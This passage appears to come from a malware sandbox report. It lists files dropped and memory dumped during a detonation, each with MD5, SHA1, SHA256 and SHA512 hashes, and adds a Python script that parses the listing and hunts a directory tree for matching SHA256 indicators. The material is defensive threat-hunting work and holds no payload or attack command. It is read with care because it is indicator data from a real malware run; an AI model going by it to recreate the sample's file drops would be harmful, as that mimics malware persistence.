| SHA256 | 6ba53e0783606f058440787b2d3e65f2f6ba8f9b881029da2cee1ca954899a16 |
| SHA512 | e59b0263f761ebdf0a3774ec0fa3552c92d2a8078feb25ed10f91f0ff2773725e925f09398a51bc340961ed45b6f65c9918a47d21a2048ccfb0580d930b1366d |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133655090403029466.txt
| MD5 | 34d41df917cd5e9f298161755db8f781 |
| SHA1 | 1b02dc05a7d5edbe4d0928869b4844e28bad39d6 |
| SHA256 | 13f00b0be5c428f37e096ea88e80e7ef2694f348f2765a93301023f880c6c44d |
| SHA512 | 55d34f180b0572b5e8f66f594dca6e141508416242d54b1f8cca6c5ca4c7d9cd61d8aebf8744feb35968aa7bf23e5956d962d9481b82f9bc44830e3a9b14b30a |
memory/4980-10310-0x000000001DE70000-0x000000001DE7A000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\P9Y213ES\microsoft.windows[1].xml
| MD5 | d00b5818a22962c590cc6ee051a07d47 |
| SHA1 | bcfb9dbd77e02927397dc89699767ee027aa4170 |
| SHA256 | 117d711d34245abdb606930bdef6cf32d042ecaa937e2b02803bd11c6294e106 |
| SHA512 | 1fbef9dbf6f4205fed319815534a6f1b039b9d7502d9c95fbe4ee57340b9ce4ee8948cc11212c89f8512dc9416e94c21405a21ae5ec8e57fb7fb20f2ea60b561 |
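The listing above is the sandbox's inventory of dropped files and memory dumps: a path line followed by MD5/SHA1/SHA256/SHA512 rows, with memory/PID-SEQ-START-END-memory.dmp entries interleaved. Several paths (C:\Windows\directx.sys, C:\Users\Admin\AppData\Local\Temp\Log.tmp) recur with different hashes, meaning the file was rewritten with new content during detonation, so a hunt keyed on path alone would miss most variants. The following Python is an added example, not code from the sandbox vendor or from this report: it parses that layout, groups records by path so rewritten files stand out, and hashes a directory tree against the collected SHA256 set. The embedded excerpt is a constructed subset of the entries above; the demo directory it builds contains harmless constructed bytes, not the samples.

```python
"""Turn a sandbox 'dropped files / memory dumps' listing into hunting data.

Added example: parses the report layout (path line, then | MD5 | ... |,
| SHA1 | ... |, | SHA256 | ... |, | SHA512 | ... | rows, with
memory/PID-SEQ-START-END-memory.dmp lines interleaved), groups records by
path so paths rewritten with different content stand out, and hashes a
directory tree against the SHA256 set.
"""
import hashlib
import os
import re
import tempfile
from collections import defaultdict

# Constructed excerpt in the report's own layout (three of the entries above).
SAMPLE_REPORT = r"""
memory/116-250-0x0000000000F30000-0x0000000000F31000-memory.dmp
C:\Windows\directx.sys
| MD5 | cc2f3b51f2e78cafce999e604a8b3277 |
| SHA1 | f2e64b7d1f0581052cbfea99a8a809922a62e69c |
| SHA256 | e6475c558d13bbad756c32a904648acf36c3f9bddd7aad597847cc159696c06f |
| SHA512 | 2cba040b4f1a5e137e9e44b1364ccec43173b677a24a3318b599c86ea4482ae2aaeb9f2af3be72fe6514dda0879b0bd506acd1e08b48f963c6ae446fc06cb6a1 |
C:\Windows\directx.sys
| MD5 | d632c97e01c7a125028c313ce55b49dd |
| SHA1 | 998def8349d2ac8955261db430ae9d8852238682 |
| SHA256 | 009672546e9bb9c8f9ee7d9ea93c58362100d06e1616d05ae228b01cd0e669e4 |
| SHA512 | 07cf721d98dd4e9e42afe40ad136f8896b0c9700926dca76ff71495ab35d66f6550d6127dc873325f9f1b7a90b3be50595725a4414a751e14d4e7a862d1c088f |
C:\Users\Admin\AppData\Local\Temp\Service.exe
| MD5 | 3bdea3d7558500f6a8a80842a692b7db |
| SHA1 | fc4ef78477a87afe430cd2a8fd75966d9b0da976 |
| SHA256 | 918278652cc928fc8ee355ab50d7bf3e807620d0fab346fd5ce4f301de83fc57 |
| SHA512 | 603f2684b6cbc38e430196986f1c5f190740bb33561bce771cccfde7a384feb0eeda769917b5933e3a533dd900cff229175c858e591b97167ca2b6fb4eb9921e |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEMDUMP = re.compile(r"^memory/(\d+)-(\d+)-(0x[0-9A-Fa-f]+)-(0x[0-9A-Fa-f]+)-memory\.dmp$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_report(text):
    """Return (files, dumps). files: [{path, MD5, SHA1, SHA256, SHA512}],
    dumps: [{pid, seq, start, end}]. Malformed hash rows raise ValueError."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEMDUMP.match(line)
        if m:
            current = None  # a dump line ends the previous file record
            dumps.append({"pid": int(m.group(1)), "seq": int(m.group(2)),
                          "start": int(m.group(3), 16), "end": int(m.group(4), 16)})
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None:
                raise ValueError("hash row without a preceding path: %s" % line)
            if len(digest) != HASH_LEN[algo]:
                raise ValueError("bad %s length for %s" % (algo, current["path"]))
            current[algo] = digest
            continue
        current = {"path": line}  # anything else starts a new file record
        files.append(current)
    return files, dumps


def variants_by_path(files):
    """Distinct SHA256 values per path; more than one means the file was
    rewritten with different content during the run."""
    groups = defaultdict(set)
    for f in files:
        if "SHA256" in f:
            groups[f["path"]].add(f["SHA256"])
    return {p: sorted(h) for p, h in groups.items()}


def sha256_of_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def hunt(root, sha256_set):
    """Walk root; return [(path, sha256)] for files whose digest is in the IOC set."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            try:
                digest = sha256_of_file(p)
            except OSError:
                continue  # unreadable/locked file: skip rather than abort the sweep
            if digest in sha256_set:
                hits.append((p, digest))
    return hits


def build_demo_tree():
    """Constructed demo directory (harmless bytes); returns (dir, sha256 of the 'bad' file)."""
    d = tempfile.mkdtemp(prefix="ioc_demo_")
    bad = b"constructed sample payload, not real malware\n"
    with open(os.path.join(d, "Service.exe"), "wb") as fh:
        fh.write(bad)
    with open(os.path.join(d, "benign.txt"), "wb") as fh:
        fh.write(b"nothing to see here\n")
    return d, hashlib.sha256(bad).hexdigest()


if __name__ == "__main__":
    files, dumps = parse_report(SAMPLE_REPORT)
    for path, hashes in variants_by_path(files).items():
        print("%d variant(s): %s" % (len(hashes), path))
    demo_dir, bad_hash = build_demo_tree()
    iocs = {f["SHA256"] for f in files if "SHA256" in f} | {bad_hash}
    print(hunt(demo_dir, iocs))
```

Feed the full listing above to parse_report to get every SHA256 in one set; hunting on SHA256 rather than MD5 or path avoids collisions and catches the rewritten directx.sys and Log.tmp variants regardless of where a copy ends up on a host. Note that the C:\PROGRA~2\... entries are the sandbox's 8.3 short names, so normalise paths before comparing them with anything from a live system.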